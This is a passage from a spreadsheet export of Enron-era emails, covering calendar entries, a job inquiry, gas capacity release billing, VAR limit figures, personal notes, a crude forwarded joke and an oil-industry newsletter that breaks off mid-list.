TAMARCHENKO, TANYA V            VASANT SHANBHOGUE               Oct 26, 2000_x000D_
WALTON, SHEILA H                DAVID OXLEY                     Oct 27, 2000_x000D_
YAMAN, SEVIL                    VASANT SHANBHOGUE               Oct 27, 2000</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Weekly Priority Mtg./Raetta_x000D_
_x000D_
Date:		8/23/2001_x000D_
Time:		9:30 AM - 10:30 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Please get me Pat Wood's phone number and post a reminder on my calendar to _x000D_
call him ASAP</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 07:57:51 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
------------_x000D_
Subject:	0_x000D_
_x000D_
Start:	Mon 2/4/2002 1:30 PM_x000D_
End:	Mon 2/4/2002 2:00 PM_x000D_
_x000D_
Recurrence:	(none)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 17:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.ajello@enron.com', 'rodney.malcolm@enron.com'})</t>
  </si>
  <si>
    <t>Message from Murali Viswanathan</t>
  </si>
  <si>
    <t xml:space="preserve">Guys, any interest?_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 07/12/2000 _x000D_
12:23 AM ---------------------------_x000D_
_x000D_
_x000D_
Muralivis@aol.com on 07/07/2000 07:06:56 PM_x000D_
To: ddelain2@enron.com_x000D_
cc:  _x000D_
Subject: Message from Murali Viswanathan_x000D_
_x000D_
_x000D_
David:_x000D_
_x000D_
I met with you last December/January in connection with working for Enron._x000D_
At that time Enron made me an offer to work in your group.  I made the_x000D_
decision to not accept the offer.  The main reason was that I could not_x000D_
digest the concept of leaving BP Amoco less than six months after I had_x000D_
joined them._x000D_
_x000D_
I am still with BP Amoco and they continue to treat me real well.  At the_x000D_
same time, I now realize that I made  a stupid mistake in turning down the_x000D_
Enron offer.  If you are willing to reconsider, I would love to talk to you._x000D_
Considering what I put you through the last time, if you do not want to_x000D_
reconsider, I can understand._x000D_
_x000D_
David, I would appreciate it I can meet with you in person to discuss this_x000D_
further with you.  If you are okay with it, can I buy you lunch and talk_x000D_
about this._x000D_
_x000D_
Looking forward to hearing from you._x000D_
_x000D_
Murali Viswanathan_x000D_
Ph. 281 363 2572 (h)_x000D_
      713 460 0641 (w)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 15:32:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.hilgert@enron.com', 'ned.higgins@enron.com', 'ben.freeman@enron.com', 'gerald.nemec@enron.com'})</t>
  </si>
  <si>
    <t>Unocal Term Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - _x000D_
Attached is the final Term Sheet (printed on ECS letterhead) to be mailed to Unocal first thing tomorrow morning._x000D_
_x000D_
 _x000D_
_x000D_
Let me know if you have any questions or comments._x000D_
_x000D_
Thanks, Lisa </t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 00:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">OK, that's funny._x000D_
_x000D_
DG_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
SSCHROED@us.ca-indosuez.com on 02/28/2001 03:28:47 PM_x000D_
To: david_craft@wbw-pc.com, dgiron@enron.com, jeff_graham@condley.com, _x000D_
bruce_d_jones@us.dell.com, sjordan@jw.com, _x000D_
randy.g.kruger.jr@arthuranderson.com, Andy.Marusak@USASports.com, _x000D_
bshaffer@securitycapital.com, mikeshaw@andrews-kurth.com, _x000D_
todd.w.taylor@bakernet.com, bwells@pop.net_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
  Little  Johnny  walked  into  his  dad's bedroom one day and found him_x000D_
  sitting  on  the side of his bed sliding a condom onto his dick. In an_x000D_
  attempt  to hide his full erection, Johnny's father bent over as if to_x000D_
  look under the bed._x000D_
_x000D_
_x000D_
  Little Johnny asked curiously, "What ya doin', Dad?"_x000D_
_x000D_
_x000D_
  His  father  quickly replied, "I thought I saw a rat go underneath the_x000D_
  bed."_x000D_
_x000D_
_x000D_
  Johnny replied, "What ya gonna do, fuck him?"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Jan 2002 03:36:34 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/3/02; HourAhead hour: 6;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/3/02; HourAhead hour: 6;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010306.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 6 / Preferred:  15.18 / Final:  15.15)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE4_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/3/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 07:51:54 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: VAR Limit Violations</t>
  </si>
  <si>
    <t xml:space="preserve">i knew you would be hiding somewhere_x000D_
i am afraid i'm going to have to tell on you_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Monday, November 19, 2001 9:37 AM_x000D_
To:	Port, David_x000D_
Subject:	FW: VAR Limit Violations_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lavorato, John  _x000D_
Sent:	Monday, November 19, 2001 8:30 AM_x000D_
To:	Hayden, Frank_x000D_
Subject:	RE: VAR Limit Violations_x000D_
_x000D_
I'm hoping that port can't find me in the new building._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Monday, November 19, 2001 7:55 AM_x000D_
To:	Lavorato, John_x000D_
Cc:	Port, David_x000D_
Subject:	VAR Limit Violations_x000D_
_x000D_
Corp VAR came in at 108_x000D_
Americas came in at 97.5_x000D_
Gas Desk came in at 69.3, up approx. 16MM_x000D_
_x000D_
Power Desk were quite, no noticeable change _x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt; OLE Object: Microsoft Excel Chart &gt;&gt; </t>
  </si>
  <si>
    <t>Sun, 26 Nov 2000 11:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dhooker@caes.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">Outstanding!!!  Still colder than shit up here--what are you guys even _x000D_
thinking on moving up here????  I'll call you to check out the details later _x000D_
this week.  Thanks. DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Hooker, David" &lt;dhooker@caes.net&gt; on 11/22/2000 09:47:43 AM_x000D_
To: Drew.Fossum@enron.com_x000D_
cc: merrileech@aol.com _x000D_
_x000D_
Subject: RE: Houston_x000D_
_x000D_
_x000D_
Absolutely!  We fire up the heater on the pool so bring the girls suits._x000D_
_x000D_
-----Original Message-----_x000D_
From: Drew.Fossum@enron.com [mailto:Drew.Fossum@enron.com]_x000D_
Sent: Tuesday, November 21, 2000 10:02 AM_x000D_
To: dhooker@caes.net_x000D_
Subject: Houston_x000D_
_x000D_
_x000D_
Hey, got my facts together on our Houston gig--we'll be down Sat. Dec. 2_x000D_
through mon the 4th.  Any chance we could swing by on Sunday and see  you_x000D_
guys?  DF_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Sep 2001 05:17:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'zcooper@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>RE: Account Information for E296-1</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings.  E296-1 is not showing up in my account.  _x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
-----Original Message-----_x000D_
From: IzioAutoEmail@convene.com [mailto:IzioAutoEmail@convene.com]_x000D_
Sent: Thursday, August 16, 2001 9:39 PM_x000D_
To: dasovich@haas.berkeley.edu_x000D_
Subject: Account Information for E296-1_x000D_
_x000D_
_x000D_
Dear Jeffrey,_x000D_
_x000D_
Zane Cooper has just added you to their course, E296-1._x000D_
_x000D_
If you feel that this is an error, please email them at: zcooper@haas.berkeley.edu_x000D_
_x000D_
If you have any questions or comments regarding this email or the Iziosystem, please forward them to: IzioSupport@convene.com._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
The IzioTeam.  _x000D_
_x000D_
_x000D_
===========================================_x000D_
This message was sent from the Izio system at http://haas.Izio.convene.com.   _x000D_
If you have any questions or comments regarding this email or the Izio system, please forward them to IzioSupport@convene.com.   _x000D_
_x000D_
 _x000D_
_x000D_
							_x000D_
			</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 01:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Just bored and writting to say hi.  What do you have going on this weekend?</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 01:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'joan.veselack@enron.com', 'joann.collins@enron.com', 'jeff.westover@enron.com', 'elizabeth.hernandez@enron.com', 'mark.feldman@enron.com', 'alicia.perkins@enron.com', 'molly.johnson@enron.com'})</t>
  </si>
  <si>
    <t>CES Storage</t>
  </si>
  <si>
    <t>Molly set up the following tickets to capture our CGAS storage transactions.  _x000D_
This is how it will work,_x000D_
_x000D_
Deal #  Comment_x000D_
268093  CES Exchange Buy - use when storage injections are less than the _x000D_
proxy volume_x000D_
268090  CES Exchange Sell - use when storage injections are greater than the _x000D_
proxy volume_x000D_
268094  CES Sell - this is the proxy storage injection ticket.  The volume _x000D_
should not change._x000D_
_x000D_
_x000D_
The daily proxy volume for the month of May is 35,133.  When we inject _x000D_
35,133, the transport we use to fill storage will be the supply for deal _x000D_
268094.  When we overinject like we did for the 1st - 4th, 35,133 of the _x000D_
transport will be matched with deal 268094 and the balance of the transport _x000D_
will be matched against deal 268090.  When we underinject, we will use deal _x000D_
268093 as the supply for deal 268094._x000D_
_x000D_
This may seem a little confusing.  Please call me if you still have questions._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 02:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>IEEE Summer meeting</t>
  </si>
  <si>
    <t>Dear Jeff_x000D_
I am Organizing a Panel at the IEEE Summer Meeting in Vancouver July 15-19_x000D_
on the California electricity crisis: cause, remedies and prevention. The_x000D_
idea is to have different perspectives e.g. operations, market power, demand_x000D_
side response, supply, regulatory etc. I would like to invite you to take_x000D_
part in this panel. As someone that was intimately involved in the_x000D_
restructuring you could provide an invaluable regulatory and political_x000D_
perspective on how did we get into this and how can we get out. At this_x000D_
point I have commitments from Fluckiger of the CAISO, Ed Kahn, Ward Uggerud_x000D_
CEO of Otter Tail Power Company, Gary Ackermann, Executive Director-Western_x000D_
Power Trading Forum and I am waiting for a commitment from Vikram Budraja._x000D_
_x000D_
Regard, Shmuel Oren</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 13:54:09 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Greg,_x000D_
_x000D_
I typed up this resume from scratch in 10 minutes.  Will it do?  If you work for the same company for 8 years your resume tends to get dusty._x000D_
Let me know if I need to beef it up or if I need to include any financial information._x000D_
_x000D_
I wanted you to review it before I sent it to Montez.  If it is ok please forward to Montez._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 21 Mar 2002 15:04:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pjamea@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'sheinha@aol.com'})</t>
  </si>
  <si>
    <t>LIVE@LIVE</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
LIVE@LIVE_x000D_
407 Main @ Preston_x000D_
713-228 LIVE_x000D_
Thursday, March 21, 2002_x000D_
Tropi Crew_x000D_
Salsa, Merengue, Latin Pop_x000D_
________________________x000D_
Friday, March 22, 2002_x000D_
The Funky_x000D_
Slob Jar Junior_x000D_
________________________x000D_
_x000D_
_x000D_
Saturday, March 23, 2002_x000D_
DJ Aliwood_x000D_
_______________________x000D_
We are now open all day for Lunch and the "Power Hour Happy Hour"_x000D_
$2 wells &amp; calls, $1.50 domestic draft beers, $4 BUD LIGHT/ MILLER LIGHT pitchers_x000D_
_______________________x000D_
_x000D_
To unsubscribe from future mailing, reply by typing "REMOVE" under "subject" heading. _x000D_
Shein</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 03:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Janet, need 2000 accomplishments and Enron resume/deal anthology for Ben _x000D_
Jacoby and Ed McMichael before Friday - please follow up._x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Thu, 2 Aug 2001 17:29:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'j..porter@enron.com', 'kay.miller@enron.com', 'maria.pavlou@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>Requested TW Capacity Releases from 11/1/00 - 8/31/01</t>
  </si>
  <si>
    <t xml:space="preserve">Per your request, attached is an Excel spreadsheet with two tabs summarizing all capacity release transactions spanning the release period from 11/1/00 - 8/31/01.  The first one (as released) depicts the transactions by offer number as posted and awarded.  The second (breakdown by month) provides the information for each offer by month, the applicable rate charged based on index spreads and a recap of the value in excess of our max tariff rate.  I have also provided some footnotes on this report for your reference.  If you need the exact language in the special terms of each offer released by PG&amp;E, I can extract the individual award summaries as I have done previously in a similar request for Lindy Donoho._x000D_
 _x000D_
Please let me know if you have any questions, need modifications or require additional data._x000D_
 _x000D_
 _x000D_
Thanks,_x000D_
Elizabeth_x000D_
x3-6928_x000D_
-----Original Message-----_x000D_
From: Watson, Kimberly _x000D_
Sent: Thursday, August 02, 2001 5:19 PM_x000D_
To: Brown, Elizabeth_x000D_
Subject: FW: Transwestern Capacity Release Report - 7/2001_x000D_
_x000D_
_x000D_
Elizabeth,_x000D_
 _x000D_
Please read below.   Can you help us put together a summary of the TW Capacity Releases from Nov. 00 to Aug. 01?  We are in the process of putting our strategy together on our Neg. Rate hearing.  Is it possible to assemble this soon?  Please give me a call if you would like to discuss.  _x000D_
 _x000D_
Many thanks,_x000D_
Kim._x000D_
-----Original Message-----_x000D_
From: Miller, Mary Kay _x000D_
Sent: Thursday, August 02, 2001 2:18 PM_x000D_
To: Pavlou, Maria; Watson, Kimberly_x000D_
Cc: 'cmoore@akingump.com'; 'rnuschler@akingump.com'; 'sstojic@gbmdc.com'; Hartsoe, Joe; Fossum, Drew; Porter, Gregory J.; Harris, Steven_x000D_
Subject: RE: Transwestern Capacity Release Report - 7/2001_x000D_
_x000D_
_x000D_
Once she has these dates,  I'd like to see from 11/00 to 2/01 which may show a change in value also.  MK_x000D_
_x000D_
-----Original Message-----_x000D_
From: Pavlou, Maria _x000D_
Sent: Thursday, August 02, 2001 11:57 AM_x000D_
To: Watson, Kimberly_x000D_
Cc: 'cmoore@akingump.com'; 'rnuschler@akingump.com'; 'sstojic@gbmdc.com'; Hartsoe, Joe; Fossum, Drew; Porter, Gregory J.; Miller, Mary Kay; Harris, Steven_x000D_
Subject: RE: Transwestern Capacity Release Report - 7/2001_x000D_
_x000D_
_x000D_
Yes, I think it would be helpful if Elizabeth can provide detail on capacity releases from Feb 2001- to July or August 2001.  Thanks, Maria_x000D_
_x000D_
-----Original Message-----_x000D_
From: Watson, Kimberly _x000D_
Sent: Wednesday, August 01, 2001 12:04 PM_x000D_
To: Porter, Gregory J.; Pavlou, Maria_x000D_
Subject: FW: Transwestern Capacity Release Report - 7/2001_x000D_
_x000D_
_x000D_
Greg and Maria,_x000D_
 _x000D_
FYI.  Here is a report for the July Capacity Releases on TW.  PG&amp;E, Sempra and Texaco all released on an Index to Index spread and are above max rate.  Elizabeth has the history of TW Capacity Releases if you think it might help in the preparation of our strategy for negotiated rates.  _x000D_
 _x000D_
Thanks, Kim._x000D_
 _x000D_
 _x000D_
-----Original Message-----_x000D_
From: Brown, Elizabeth _x000D_
Sent: Tuesday, July 31, 2001 10:58 PM_x000D_
To: Giambrone, Laura; Hernandez, Bert; McEvoy, Christine; Minter, Tracy; Mulligan, Amy; Miller, Beverly; Ward, Linda_x000D_
Cc: Kowalke, Terry; Buchanan, John; Blair, Lynn; Cherry, Paul; Dietz, Rick; Cormier, Martha; Lee, Dennis; Eldridge, Dale; Williams, John; Bianchi, Rita; Watson, Kimberly; Donoho, Lindy; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle_x000D_
Subject: Transwestern Capacity Release Report - 7/2001_x000D_
_x000D_
_x000D_
_x000D_
Attached is the Transwestern Capacity Release Report that provides billing information for July 2001 reservation invoices.  _x000D_
_x000D_
Please be advised that the PG&amp;E (Core) releases exceeded the maximum tariff rate as summarized below (the first three were special calculations based on index spreads and the last one was a fixed rate):_x000D_
_x000D_
PG&amp;E Energy Trading-Gas Corporation           60,000/day * 31 days * $0.7081 = $1,317,066.00 _x000D_
Sempra Energy Trading Corp.                           15,000/day * 31 days * $1.9951 = $   927,721.50 _x000D_
Texaco Natural Gas, Inc.                                  50,000/day * 31 days * $0.7468 = $1,157,540.00_x000D_
_x000D_
Duke Energy Trading and Marketing, LLC        25,000/day * 31 days * $1.1600 = $  899,000.00_x000D_
_x000D_
These amounts will be billed to the acquiring shippers and once payments are received, PG&amp;E will subsequently receive reimbursement._x000D_
_x000D_
Feel free to contact me should you have any questions._x000D_
_x000D_
 _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Elizabeth_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 15:18:41 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
	Friday_x000D_
January 18, 2002	 &lt;http://www.sonsub.com/&gt; 		_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	 RIGZONE &lt;http://www.rigzone.com/images/email/top_Rigzone.jpg&gt;	  &lt;http://www.rigzone.com/images/email/top_Curve.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/email/top_DailyNews.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	home &lt;http://www.rigzone.com/default.asp&gt; | news &lt;http://www.rigzone.com/news/&gt; | search &lt;http://www.rigzone.com/search/&gt; | maps &lt;http://www.rigzone.com/maps/&gt; | data &lt;http://www.rigzone.com/data/&gt; | jobs &lt;http://www.rigzone.com/jobs/&gt; | market &lt;http://www.rigzone.com/market/&gt; | store &lt;http://www.rigzone.com/store/&gt; 	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	In This Issue	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Current Oil and Gas Industry News_x000D_
T! op Stories for the Past 7 Days_x000D_
Featured Events and Conferences_x000D_
What's in Store - Books &amp; More_x000D_
_x000D_
Featured Employment Opportunities_x000D_
Surplus Oilfield Equipment For Sale_x000D_
Worldwide Offshore Rig Utilization_x000D_
Oil &amp; Gas Prices_x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Industry Headlines	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Latest Offshore Rig Activity &lt;http://www.rigzone.com/news/article.asp?a_id=2425&gt;_x000D_
The worldwide mobile offshore rig count was up 4 for the week with 3 jackups and one semisub seeing new contracts._x000D_
_x000D_
CNOOC Jackup Leaves China &lt;http://www.rigzone.com/news/article.asp?a_id=2414&gt;_x000D_
CNOOC secured the first contract for overseas service as an independent contractor in the international drilling market._x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
advertisement	_x000D_
A National-Oilwell designed, 1992 built modular offshore drilling rig is available for sale direct from the manufacturer. This rig drilled only 5 wells from the Draugen platform in the Norwegian sector of the North Sea. Click on the link below for full details, photos and seller contact information: _x000D_
_x000D_
&lt;http://www.rigzone.com/market/surplus_listing.asp?eq_id=397&gt; _x000D_
_x000D_
	_x000D_
_x000D_
Exploration	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Celtic Resources To Farmout North Sea Licenses  &lt;http://www.rigzone.com/news/article.! asp?a_id=2423&gt;_x000D_
Mustang Oil Ltd and Celtic Petroleum Ltd have entered a farmout agreement for their United Kingdom Seaward licences North Sea blocks 49/1c, 49/2b and 49/2c, to GDF Britain Ltd._x000D_
_x000D_
Conoco Focuses on Indonesia  &lt;http://www.rigzone.com/news/article.asp?a_id=2422&gt;_x000D_
Conoco expects to spend over $2.5 billion in Indonesia during the next nine years, as part of planned investment of $3.4 billion between 1998 and 2010._x000D_
_x000D_
Novus Petroleum Wins Padre Island Acreage  &lt;http://www.rigzone.com/news/article.asp?a_id=2421&gt;_x000D_
The Padre Island Project joint venture has been awarded drilling leases totaling 12,630 acres in the Padre Island area, in shallow waters offshore Texas._x000D_
_x000D_
Statoil and ExxonMobil Swap Norwegian Acreage &lt;http://www.rigzone.com/news/article.asp?a_id=2417&gt;_x000D_
On January 1, 2002, Statoil took over operatorship and a 20 percent stake in the F-p! rospect of the Barents Sea from ExxonMobil._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Production	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http:/! /www.rigzone.com/images/spacer.gif&gt;	_x000D_
Edison and BG Supply LNG to Gaz de France &lt;http://www.rigzone.com/news/article.asp?a_id=2420&gt;_x000D_
Edison and BG will soon sign a 20-year agreement to supply Gaz de France with liquefied natural gas beginning in 2005._x000D_
_x000D_
Statoil Makes Record Gas Sales &lt;http://www.rigzone.com/news/article.asp?a_id=2418&gt;_x000D_
On January 13, 2002, Statoil supplied a total of 137 million cubic meters of gas to customers in Europe beating the record set last winter._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Company &amp; Financial News	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Enron To Select New Auditor  &lt;http://www.rigzone.com/news/article.asp?a_id=2426&gt;_x000D_
The Enron Corp. Board of Directors voted today to discharge Arthur Andersen as ! the company's auditor._x000D_
_x000D_
PGS Awarded $58 Million in New Contracts &lt;http://www.rigzone.com/news/article.asp?a_id=2424&gt;_x000D_
Petroleum Geo-Services ASA announced that its onshore division has secured new seismic acquisition contracts in the United States, Ecuador, India and Bangladesh valued at $58 million._x000D_
_x000D_
Lukoil Announces New Directors &lt;http://www.rigzone.com/news/article.asp?a_id=2419&gt;_x000D_
LUKOIL has nominated Mark Mobius and a leading ChevronTexaco executive to be independent directors._x000D_
_x000D_
Global Industries Announces Management Changes &lt;http://www.rigzone.com/news/article.asp?a_id=2416&gt;_x000D_
Global Industries, Ltd. has appointed William J. Dore, Jr. to the position of Vice President - Investor Relations. _x000D_
_x000D_
FTC Requests More Info from Phillips and Conoco &lt;http://www.rigzone.com/news/article.asp?a_id=2415&gt;_x000D_
Phillips Petroleum Company and Conoco have both received requests from the Federal Trade Commis! sion for additional information._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
_x000D_
advertisement	_x000D_
 &lt;http://www.rigzone.com/news/event_detail.asp?event_id=194&gt; Human Resources in Oil and Gas is the comprehensive HR forum for the industry. The conference will deal with attracting and retaining quality staff and dealing with the effects of mergers, acquisitions, and restructuring. This conference is a must for anyone involved in the often hectic human resources decisions of todays oil and gas companies. HR in Oil and Gas is being held in Aberdeen on February 27 and 28. Click here for more information. &lt;http://www.rigzone.com/news/event_detail.asp?event_id=194&gt; 	_x000D_
_x000D_
	_x000D_
_x000D_
Last 7 Days Top Stories	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Former Enron Execs Start New Company &lt;http://www.rigzone.com/n! ews/article.asp?a_id=2387&gt;_x000D_
Several former Enron senior executives have formed a new company to provide risk management services to the energy industry._x000D_
_x000D_
Anadarko Petroleum Provides 2002 Outlook &lt;http://www.rigzone.com/news/article.asp?a_id=2384&gt;_x000D_
Anadarko Petroleum Corporation outlines its expectations for capital spending for 2002 and offers guidance on 2001 financial and operating results._x000D_
_x000D_
U.S. Approves Deepwater Royalty Relief &lt;http://www.rigzone.com/news/article.asp?a_id=2405&gt;_x000D_
Gale Norton, Secretary of the Interior, announced that oil and gas companies drilling in Gulf of Mexico deepwater will be given royalty reductions._x000D_
_x000D_
National-Oilwell Acquires HALCO &lt;http://www.rigzone.com/news/article.asp?a_id=2375&gt;_x000D_
National-Oilwell has acquired HAL Oilfield Pump &amp; Equipment Company._x000D_
_x000D_
Anderson Employees ! Destroy Enron Documents &lt;http://www.rigzone.com/news/article.asp?a_id=2369&gt;_x000D_
Andersen reports that individuals in the firm have disposed of a significant number of electronic and paper documents and correspondence relating to the Enron account_x000D_
_x000D_
Venture To Begin Drilling Program on Sycamore Field &lt;http://www.rigzone.com/news/article.asp?a_id=2397&gt;_x000D_
Venture Production will start drilling in May of this year at its Sycamore field in the UK Sector of the North Sea._x000D_
_x000D_
Statoil Sells First Oil From Girassol &lt;http://www.rigzone.com/news/article.asp?a_id=2400&gt;_x000D_
Statoil has sold its first load of crude - one million barrels - from the TotalFinaElf-operated Girassol field offshore Angola._x000D_
_x000D_
Energy Partners Completes Hall-Houston Acquisition &lt;http://www.rigzone.com/news/article.asp?a_id=2401&gt;_x000D_
Energy Partners, Ltd. has completed the acquisition of Hall-Houston and has elected Gary Hall, HHOC's founder, to the post of Vice-Chairman of EPL._x000D_
_x000D_
Shell and CNOOC Sign PSC Agreement &lt;http://www.r! igzone.com/news/article.asp?a_id=2386&gt;_x000D_
CNOOC and Shell Exploration China Limited signed a Production Sharing Contract for the exploration of the Bonan area of Bohai Bay._x000D_
_x000D_
Kongsberg Awarded Crazy Horse Project &lt;http://www.rigzone.com/news/article.asp?a_id=2379&gt;_x000D_
Kongsberg Simrad has been awarded a contract for providing an integrated control and monitoring system to BP for the Crazy Horse PDQ semisub._x000D_
_x000D_
Talisman Expects to Spend $2 Billion in 2002 &lt;http://www.rigzone.com/news/article.asp?a_id=2388&gt;_x000D_
Talisman's 2002 budget for exploration and development is $2 billion which is a 6% increase over the 2001 budget._x000D_
_x000D_
Petronas and Bahrain Develop Offshore Exploration Program &lt;http://www.rigzone.com/news/article.asp?a_id=2382&gt;_x000D_
Petronas and Bahraini officals met over the weekend to discuss a program for drilling offshore Bahrain._x000D_
_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
_x000D_
Upcoming Oil &amp; Gas Industry Events	  &lt;http://www.rigzone.com/images/email/title_Corner.gif&gt;	_x000D_
  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	  &lt;http://www.rigzone.com/images/spacer.gif&gt;	_x000D_
Jan. 22 	Alliances and Partnering in Oil &amp; Gas &lt;http://www.rigzone.com/news/event_detail.asp?event_id=75&gt;	Singapore	_x000D_
Feb. 6 	Torch Mid-Winter Energy Conference &lt;http://www.rigzone.com/news/event_detail.asp?event_id=196&gt;	New York	_x000D_
Feb. 7 	Marine Construction 2002 &lt;http://www.rigzone.com/news/event_detail.asp?event_id=166&gt;	Houston	_x000D_
Feb. 10 	2002 SPE International Petroleum Conference &amp; Exhibition in Mexico	Villahermosa	_x000D_
